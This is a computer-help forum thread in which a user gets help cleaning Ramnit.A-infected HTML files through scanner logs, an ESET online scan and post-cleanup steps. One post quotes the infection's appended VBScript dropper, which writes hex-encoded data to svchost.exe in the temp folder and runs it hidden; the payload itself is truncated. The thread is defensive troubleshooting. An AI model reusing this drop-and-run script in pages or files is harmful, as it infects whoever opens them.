HTML files infected by RAMNIT.a

I had a W32/RAMNIT.a infection on my PC, which the McAfee Virus removal team could not remove and told me to go to my computer supplier.

As will be seen from other threads, this nasty alters the registry, adds a program (DesktopLayer.exe) which autoruns on login (from an undeletable registry entry) infects, .exe and .dll file and (something I haven't seen stated much) is that it also infects every .html file and adds some vbs code to call SVCHOST.exe with a dropfile and a shedload of hex-code.

Every HTML file on my PC (over 1,000 of them) was altered on the same afternoon and all now contain this code.

I installed a new HDD, new OS, re-installed McAfee Internet Security Suite and only pulled back from my drive those files which "passed."

trouble it it passed all the html files which I have not dared to open in Internet explorer - though I have examined them in notepad.

Is there a routine anyone has that will clean these files - or do I have to manually remove the code from each one.

Incidentally my second call to Mcafee resulted in them telling me that this code is quite safe and nothing to worry about - can anyone confirm this or am i right to be paranoid?

 

Welcome to MajorGeeks!

We have a bit of a dilemma here. Since the infected files are documents, that I am assuming you need to keep, if we go to cleaning the computer you might loose them in the process.

So, with that said. We can not give you a proper diagnosis until we get the logs from the READ & RUN ME FIRST. Malware Removal Guide.

Can you copy the files onto a flash drive or CD so if they do end up being removed or "cleaned" by one of the scanners you will still have a copy of them? It may be an infected copy but that's better than NO copy at all.

 

Sorry - please find attached the logfile for combofix. the other programs reported no issues.

I have backed up the suspect .html files (and still have not opened any of them in IE)



Colin

 

Oops missed a couple of logs - ignore for the present :-o

 

unable to install RootRepeal
reported sveral files missing.

remaining files installed as requested. HTML files all backed up.

SAS did not leave me a log - though no issues or erros were reported.

Best regards, Colin

 

Try this one please.


Download the GMER Rootkit Detector and save it your desktop.

* Extract it to your desktop and double-click GMER.exe
* Make sure all of the boxes on the right of the screen are checked, EXCEPT for "Show All".
* Click the Rootkit tab and then Scan.
* Don't check the Show All box while scanning in progress!
* When scanning is finished click Copy.
* This copies the log to clipboard
* Attach the log in your reply.

 

GMER file attached as requested - sorry for the delay - was away at the weekend and the file would not upload yesterday - said the service was unavailable.

 

I don't see anything in your logs to indicate that the computer is infected.

Can you attach the MBAM and SAS logs please. They are located here:

Code:

C:\Users\Colin\AppData\Roaming\SUPERAntiSpyware.com\SUPERAntiSpyware\Logs\"
supera~1.log

Code:

C:\Users\Colin\AppData\Roaming\Malwarebytes\Malwarebytes' Anti-Malware\Logs\"
mbam-l~1.txt

 

As I said in my first post, I am sure I have cleared the infection on the PC - a new Hard disk drive and a new Operating system sorted that. The problem is that every .html file on the data I susequently imported from the old PC wasn altered on the same day the virus went active. (File properties alll showing same modified time and date)

They each have the same code appended at the end of the file (opened in notepad - i have opened none of them yet in Internet Explorer)

The code begins with
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000... followed by many lines of hex code teminating with

0000000000000000000000000000000000000000000000000000000000000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

This is the code I am concerned about. It is present in over 1000 files. My fear is that if I open one in explorer and authorise the page to run the Active x script, I will be back to square one with the PC.

Thanks for the help finding the files must have a setting turned off in my admin login that failed my search for them!

 

Sorry for the delay. I had to ask a few questions on how to proceed with this before giving advice on moving forward.

Do you have the HTML files backed up somewhere like a CD or flash drive? If on a flash drive make sure it is not connected to the computer. We will use a good online scanner that has the ability to clean HTML files but as with anything you need to have them backed up in case the scanner removes them instead of cleaning them.

First clean out any unnecessary junk with TFC to make the online scan go faster.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.




Next let's see if the ESET online scan can repair the files. Follow the directions here. Using ESET's Online Scanner

Attach the log when complete.

 

Congratulations and thanks!! This process confirmed my suspicions and found 1707 files infected by ramnit.a

I didn't witness the whole scan and I did note there was at elat one other potential threat identified, but without doubt the .html files I identified as modified are all in this list.

McAfee Virus Removal team, and their supervisor to whom I escalated the issue when they first told me it was ok to run any of them, assured me they were ok - (they were using remote access to scan and view the PC and inspected the files (I showed them the dubious code and she told me that was quite normal and not to worry!!!)

This synptom of the virus doesn't seem to ahve got much publicity - Mcafee only had RAmnit.a as a "LOW" threat!

Log attached as requested.

 

I was confident they would be found. The question was if they would be repaired or deleted. It looks like they were deleted, were they cleaned or deleted?

That was not a threat. It's part of MGtools which some antivirus see as a threat.

Microsoft has it as a severe threat. Research Worm:Win32/Ramnit.A


Are these HTML documents web pages you are saving to your computer?

 

They were all deleted - I do have a backup

Yes I pointed that out to their VRT supervisor - didn't get much of a reaction.

They are mainly (if not all) saved web pages.

 

I would think that using bookmarks would be a better method. Unless you need them for offline viewing.


For an automated repair there is a fix that a person posted here:

http://polygoncell.blogspot.com/2010/08/i-got-infection-of-virus-on-my-pc-last_7746.html

Warning: We know nothing about this person or the fix so you will have to decide whether you wish to try it or whether want to make there own fix or do it manually.

 

Was for offline viewing (many were from now defunct web sites - others were for purchases made etc.)

Noted thanks

And thanks very much for your help. I was very uneasy about the assurance from McAfee. This was an issue I had escalated to their supervisory team after I did not accept the assurance from the tier 1 team.

I am SO glad that I was referred here by a colleague at work. Thanks once again

Colin

 

You may never get infected again but in the case that you do it is always a good idea to have your important information backed up (photos, documents etc.). The virus could have wiped out the documents and you would have no way of getting them back. If you do keep them on the computer put them in a zip file and password protect it.

Here are a few solutions. Note: In case of hard drive failure, don't keep your backups on the same drive you use daily. Use another drive, a flash drive or burn them to a CD.

Free online storageYou can search Google for free storage. Just be careful on what you choose. Some have strict limits and will delete your stuff for various reasons including if you don't log in regularly. I don't have a huge amount of documents and pictures so Googles' Picasa and Google Docs works for me.

Major Geeks offers 500MB of free online storage: Details here. Also offered is paid upgrades with reasonable rates. Dropbox also has paid and free solutions.

Then there is the always reliable method of using CD's or one or more flash drives.




If you are not having any other malware problems on the computer, it is time to do our final steps:

1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no real time protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.We recommend them for doing backup scans when you suspect a malware infection.
2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
   • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
   • "%userprofile%\Desktop\combofix" /uninstall
     • Notes: The space between the combofix" and the /uninstall, it must be there.
     • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
     
     
3. Go back to step 6 of the READ ME and re-nable your Disk Emulation software with Defogger if you had disabled it.
4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
7. Go to add/remove programs and uninstall HijackThis.
8. Go to the C:\MGtools folder and find the MGclean.bat file. Double click on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.
9. If you are running Win 7, Vista, Windows XP or Windows ME, do the below:
   • Refer to the cleaning procedures pointed to by step 7 of the READ ME
     for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
   • Then reboot and Enable System Restore to create a new clean Restore Point.
10. After doing the above, you should work through the below link:
    • How to Protect yourself from malware!